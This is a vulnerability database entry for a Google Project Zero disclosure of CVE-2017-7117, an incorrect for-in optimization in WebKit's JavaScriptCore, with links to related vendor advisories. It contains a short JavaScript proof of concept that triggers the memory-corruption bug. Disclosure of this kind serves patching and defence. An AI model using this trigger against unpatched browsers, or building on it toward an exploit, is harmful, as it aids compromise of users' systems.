Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormGoogle Security ResearchPACKETSTORM:144496
HistoryOct 03, 2017 - 12:00 a.m.

WebKit JSC Incorrect Optimization

2017-10-0300:00:00
Google Security Research
packetstormsecurity.com
36

0.085 Low

EPSS

Percentile

94.5%

JSON
`WebKit: JSC: Incorrect for-in optimization #2  
  
CVE-2017-7117  
  
  
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal  
  
PoC:  
function f() {  
let o = {};  
for (let i in {xx: 0}) {  
for (i of [0]) {  
  
}  
  
print(o[i]);  
}  
}  
  
f();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Related

nvd 1
cvelist 1
ubuntucve 1
prion 1
debiancve 1
cve 1
seebug 1
openvas 7
ubuntu 1
nessus 8
kaspersky 2
apple 10
mageia 1
freebsd 1
suse 2
nvd
nvd
CVE-2017-7117
2017-10-23 01:29:13
cvelist
cvelist
CVE-2017-7117
2017-10-23 01:00:00
ubuntucve
ubuntucve
CVE-2017-7117
2017-10-18 00:00:00
prion
prion
Memory corruption
2017-10-23 01:29:00
debiancve
debiancve
CVE-2017-7117
2017-10-23 01:29:13
cve
cve
CVE-2017-7117
2017-10-23 01:29:13
seebug
seebug
WebKit: JSC: Incorrect for-in optimization #2(CVE-2017-7117)
2017-10-10 00:00:00
openvas
openvas
Ubuntu: Security Advisory (USN-3460-1)
2017-10-25 00:00:00
Apple iTunes Security Updates (HT208141)
2017-10-25 00:00:00
Apple iCloud Security Updates (HT208142)
2017-09-26 00:00:00
ubuntu
ubuntu
WebKitGTK+ vulnerabilities
2017-10-23 00:00:00
nessus
nessus
Ubuntu 16.04 LTS : WebKitGTK+ vulnerabilities (USN-3460-1)
2017-10-24 00:00:00
Apple iTunes < 12.7 WebKit Multiple Vulnerabilities (uncredentialed check)
2017-09-27 00:00:00
Apple iTunes < 12.7 WebKit Multiple Vulnerabilities (credentialed check)
2017-09-27 00:00:00
kaspersky
kaspersky
KLA11127 Multiple vulnerabilities in Apple iTunes
2017-09-25 00:00:00
KLA11126 Multiple vulnerabilities in Apple Safari
2017-10-23 00:00:00
apple
apple
About the security content of Safari 11 - Apple Support
2018-02-14 07:14:51
About the security content of Safari 11
2017-09-19 00:00:00
About the security content of iTunes 12.7 for Windows - Apple Support
2018-10-18 05:03:03
mageia
mageia
Updated webkit2 packages fix security vulnerabilities
2017-11-27 00:18:31
freebsd
freebsd
webkit2-gtk3 -- multiple vulnerabilities
2017-10-18 00:00:00
suse
suse
Security update for webkit2gtk3 (important)
2018-02-01 00:14:30
Security update for webkit2gtk3 (important)
2018-01-25 21:10:00

0.085 Low

EPSS

Percentile

94.5%

JSON
Related for PACKETSTORM:144496
nvd1cvelist1ubuntucve1prion1debiancve1cve1seebug1openvas7ubuntu1nessus8kaspersky2apple10mageia1freebsd1suse2